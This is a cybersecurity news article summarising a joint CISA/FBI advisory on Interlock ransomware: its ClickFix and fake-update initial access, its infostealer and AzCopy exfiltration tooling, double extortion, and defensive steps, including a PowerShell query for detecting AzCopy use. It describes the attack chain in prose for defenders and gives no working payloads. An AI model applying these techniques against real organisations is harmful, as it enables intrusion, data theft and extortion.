CISA and FBI Warn of Interlock Ransomware Using ClickFix to Hit Critical Infrastructure

The FBI, CISA, the Department of Health and Human Services, and the Multi-State Information Sharing and Analysis Center released joint advisory AA25-203A detailing Interlock ransomware tactics, techniques, and procedures observed through mid-2025. Interlock has targeted critical infrastructure, healthcare, technology, government, and manufacturing organizations in North America and Europe since its emergence in September 2024. The group’s operational signature includes three distinct initial access methods — including the increasingly common ClickFix social engineering technique — combined with credential-harvesting infostealers and a double-extortion model that encrypts systems after exfiltrating data.

// 01 Interlock Ransomware: Technical Details

Interlock is a cross-platform ransomware strain with variants targeting both Windows and Linux environments. Encrypted files receive either a .interlock or .1nt3rlock extension depending on the variant. The ransom note, named !__README__!.txt, is delivered via Group Policy for maximum coverage across domain-joined systems.

Initial Access

FBI investigations through June 2025 identify three primary initial access vectors:

• Drive-by downloads from compromised legitimate websites — Interlock actors compromise reputable third-party sites to serve malicious downloads, allowing targeting by visitor geography or industry without requiring phishing infrastructure.

• Fake browser update lures — malicious payloads disguised as Google Chrome, Microsoft Edge, or security software updates are distributed via compromised pages. Earlier campaigns used browser-update filenames; more recent activity has shifted toward security software update impersonation.

• ClickFix social engineering — victims encounter a fake error dialog on a compromised or attacker-controlled webpage instructing them to open the Windows Run dialog and paste a PowerShell command to “fix” the displayed issue. Executing the pasted command installs the Interlock dropper. ClickFix is effective because it routes execution through a user-initiated action, bypassing browser download warnings and endpoint policies that flag file downloads.

Post-Compromise Activity

Once inside a network, Interlock operators deploy several tools for lateral movement and data staging:

• Lumma Stealer and Berserk Stealer to harvest credentials for lateral movement and privilege escalation
• AnyDesk for persistent remote connectivity to compromised hosts
• PuTTY for SSH-based lateral movement within compromised networks
• Azure Storage Explorer (StorageExplorer.exe) and AzCopy to navigate and exfiltrate data to attacker-controlled Azure Blob Storage accounts

Exfiltration precedes encryption. Interlock actors stage stolen data in Azure before deploying the encryptor, establishing leverage for the double-extortion demand: pay to decrypt, or the stolen data gets published on the Interlock data-leak site.

// 02 Exploitation Status and Threat Landscape

Interlock has been actively operating since September 2024 with confirmed impact across critical infrastructure, healthcare, technology, government, and manufacturing sectors, predominantly in North America and Europe. The advisory draws on FBI investigation data through June 2025 and corroborating private threat intelligence.

The ClickFix vector is notable because it defeats several common defensive layers simultaneously. Users who see a familiar-looking “Fix this issue” error message on a website they trust are more likely to follow the instructions than to scrutinize a suspicious file download. DNS filtering and web proxies that block known malicious domains provide partial mitigation, but Interlock’s use of compromised legitimate sites means the hosting domain itself may be trusted.

The combination of infostealers, credential-based lateral movement, and Azure-native exfiltration tools makes Interlock particularly difficult to detect before encryption begins: the tooling overlaps significantly with legitimate IT administration activity.

// 03 Who Is Affected

Interlock targets do not appear to be constrained by organization size. The advisory’s victim profile includes smaller healthcare providers and municipal government entities alongside larger enterprises. The common denominator is sector membership in critical infrastructure, healthcare, technology, or government — organizations likely to pay ransoms under operational pressure and likely to hold data worth publishing.

// 04 What You Should Do Right Now

• Block ClickFix delivery. Deploy DNS filtering on known ClickFix and fake-update domains. Implement web gateway policies that flag pages containing instructions to open a Run dialog or paste PowerShell commands. User awareness training on ClickFix lures is complementary to technical controls.

• Restrict and monitor RDP access. Interlock actors move laterally via RDP using stolen credentials. If RDP must be exposed, limit it to VPN-authenticated sessions and alert on logins from unusual source IPs or during off-hours.

• Detect AzCopy-based exfiltration. Monitor for AzCopy.exe or StorageExplorer.exe initiating outbound connections to *.blob.core.windows.net from servers that do not routinely use Azure services:

“powershell Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4688]]" | Where-Object { $_.Message -match "AzCopy|StorageExplorer" } “

• Hunt for infostealer infections proactively. Lumma Stealer and Berserk Stealer typically deploy weeks before ransomware. Indicators of compromise for both are included in advisory AA25-203A. Scan endpoints and remove infections before harvested credentials enable lateral movement.

• Block .interlock and .1nt3rlock file extensions in file integrity monitoring and EDR policies. Detecting encryption activity early can limit the blast radius significantly before full network encryption completes.

• Test your incident response plan. CISA’s advisory explicitly notes that organizations without exercised IR plans face worse outcomes. Run a tabletop scenario simulating Interlock’s attack chain — initial website compromise, infostealer infection, lateral movement, and encryption — against your current detection stack.

// 05 Conclusion

Interlock is an operationally mature ransomware group using social engineering techniques — particularly ClickFix — that bypass standard download-based defenses. Organizations in critical infrastructure, healthcare, and government should validate that their detection stack covers the described attack chain: infostealer infection, AzCopy exfiltration, and RDP-based lateral movement all precede encryption and represent earlier, more actionable detection opportunities.